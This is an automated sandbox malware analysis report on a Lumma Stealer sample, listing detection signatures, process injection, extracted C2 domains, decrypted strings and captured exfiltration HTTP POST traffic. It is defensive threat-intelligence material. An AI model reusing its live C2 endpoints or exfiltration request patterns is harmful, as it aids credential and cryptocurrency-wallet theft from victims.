Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Armanivenntii_crypted_EASY.exe

Overview

General Information

Sample name:Armanivenntii_crypted_EASY.exe
Analysis ID:1577513
MD5:795197155ca03f53eed7d90a2613d2a7
SHA1:e177b0c729b18f21473df6decd20076a536e4e05
SHA256:9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
Tags:18521511316185215113209bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Armanivenntii_crypted_EASY.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe" MD5: 795197155CA03F53EED7D90A2613D2A7)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
      • WerFault.exe (PID: 7920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["charecteristicdxp.shop", "consciousourwi.shop", "cagedwifedsozm.shop", "potentioallykeos.shop", "weiggheticulop.shop", "deicedosmzj.shop", "weaknessmznxo.shop", "interactiedovspm.shop", "southedhiscuso.shop"], "Build id": "LPnhqo--uzkmvityzcqq"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 17 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:40.141083+010020283713Unknown Traffic192.168.2.44973123.55.153.106443TCP
                2024-12-18T14:46:42.722528+010020283713Unknown Traffic192.168.2.449732172.67.157.254443TCP
                2024-12-18T14:46:46.202441+010020283713Unknown Traffic192.168.2.449733172.67.157.254443TCP
                2024-12-18T14:46:54.945532+010020283713Unknown Traffic192.168.2.449735172.67.157.254443TCP
                2024-12-18T14:47:00.482296+010020283713Unknown Traffic192.168.2.449740172.67.157.254443TCP
                2024-12-18T14:47:05.081834+010020283713Unknown Traffic192.168.2.449742172.67.157.254443TCP
                2024-12-18T14:47:10.368912+010020283713Unknown Traffic192.168.2.449743172.67.157.254443TCP
                2024-12-18T14:47:13.323735+010020283713Unknown Traffic192.168.2.449744172.67.157.254443TCP
                2024-12-18T14:47:16.248484+010020283713Unknown Traffic192.168.2.449745172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:44.969235+010020546531A Network Trojan was detected192.168.2.449732172.67.157.254443TCP
                2024-12-18T14:46:53.381370+010020546531A Network Trojan was detected192.168.2.449733172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:44.969235+010020498361A Network Trojan was detected192.168.2.449732172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:53.381370+010020498121A Network Trojan was detected192.168.2.449733172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:37.349272+010020552911Domain Observed Used for C2 Detected192.168.2.4514501.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:37.043038+010020552931Domain Observed Used for C2 Detected192.168.2.4519951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:38.089179+010020552951Domain Observed Used for C2 Detected192.168.2.4568371.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:37.578557+010020552971Domain Observed Used for C2 Detected192.168.2.4629721.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:36.816300+010020552991Domain Observed Used for C2 Detected192.168.2.4499601.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:36.582167+010020553011Domain Observed Used for C2 Detected192.168.2.4540631.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:37.868270+010020553031Domain Observed Used for C2 Detected192.168.2.4613761.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:36.278477+010020547901Domain Observed Used for C2 Detected192.168.2.4520431.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:38.319716+010020553071Domain Observed Used for C2 Detected192.168.2.4585711.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:59.011555+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T14:46:40.902599+010028586661Domain Observed Used for C2 Detected192.168.2.44973123.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Armanivenntii_crypted_EASY.exeAvira: detected
                Source: cagedwifedsozm.shopAvira URL Cloud: Label: malware
                Source: weaknessmznxo.shopAvira URL Cloud: Label: malware
                Source: consciousourwi.shopAvira URL Cloud: Label: malware
                Source: weiggheticulop.shopAvira URL Cloud: Label: malware
                Source: potentioallykeos.shopAvira URL Cloud: Label: malware
                Source: interactiedovspm.shopAvira URL Cloud: Label: malware
                Source: https://southedhiscuso.shop:443/apiAvira URL Cloud: Label: malware
                Source: 0.2.Armanivenntii_crypted_EASY.exe.6cdc0000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["charecteristicdxp.shop", "consciousourwi.shop", "cagedwifedsozm.shop", "potentioallykeos.shop", "weiggheticulop.shop", "deicedosmzj.shop", "weaknessmznxo.shop", "interactiedovspm.shop", "southedhiscuso.shop"], "Build id": "LPnhqo--uzkmvityzcqq"}
                Source: C:\Users\user\AppData\Roaming\d3d9x.dllReversingLabs: Detection: 65%
                Source: Armanivenntii_crypted_EASY.exeReversingLabs: Detection: 63%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\d3d9x.dllJoe Sandbox ML: detected
                Source: Armanivenntii_crypted_EASY.exeJoe Sandbox ML: detected
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: weiggheticulop.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: consciousourwi.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: southedhiscuso.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deicedosmzj.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cagedwifedsozm.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: charecteristicdxp.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: interactiedovspm.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: potentioallykeos.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: weaknessmznxo.shop
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--uzkmvityzcqq
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00414B89 CryptUnprotectData,2_2_00414B89
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]2_2_0041F090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040A0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebx+edx], 0000h2_2_004140A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00436120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040F27F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041538C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]2_2_0041538C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add edi, 02h2_2_0040F403
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+00000A90h]2_2_0041C490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_0041C490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [00440054h], 00000000h2_2_0043354F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h2_2_00420D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00420D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]2_2_00414570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h2_2_00414570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00416D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]2_2_00404E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+00000774h]2_2_00422EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+18h]2_2_00422EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_00416720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]2_2_004157D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor eax, eax2_2_0041F7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0041C0AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00409940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]2_2_0041F178
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00422130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00411199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h2_2_004211B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004211B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00403A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00432220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+000000B8h]2_2_00412367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0042BB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0041DB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx2_2_00434B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00410B95
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00421465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00418C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h2_2_0041A400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]2_2_00412CE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]2_2_004304E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [00440054h], 00000000h2_2_00433DAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx2_2_00434661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h2_2_00412691
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_0041D6A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_004186A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_004186A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_004036B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, edx2_2_00434770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00422700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h2_2_0041FF23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]2_2_004147CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h2_2_004147CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]2_2_004137BD

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2055297 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deicedosmzj .shop) : 192.168.2.4:62972 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055301 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) : 192.168.2.4:54063 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2054790 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weaknessmznxo .shop) : 192.168.2.4:52043 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055299 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) : 192.168.2.4:49960 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055295 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (consciousourwi .shop) : 192.168.2.4:56837 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055307 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weiggheticulop .shop) : 192.168.2.4:58571 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055293 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) : 192.168.2.4:51995 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055303 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (southedhiscuso .shop) : 192.168.2.4:61376 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2055291 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (cagedwifedsozm .shop) : 192.168.2.4:51450 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49731 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.157.254:443
                Source: Malware configuration extractorURLs: charecteristicdxp.shop
                Source: Malware configuration extractorURLs: consciousourwi.shop
                Source: Malware configuration extractorURLs: cagedwifedsozm.shop
                Source: Malware configuration extractorURLs: potentioallykeos.shop
                Source: Malware configuration extractorURLs: weiggheticulop.shop
                Source: Malware configuration extractorURLs: deicedosmzj.shop
                Source: Malware configuration extractorURLs: weaknessmznxo.shop
                Source: Malware configuration extractorURLs: interactiedovspm.shop
                Source: Malware configuration extractorURLs: southedhiscuso.shop
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: lev-tolstoi.com
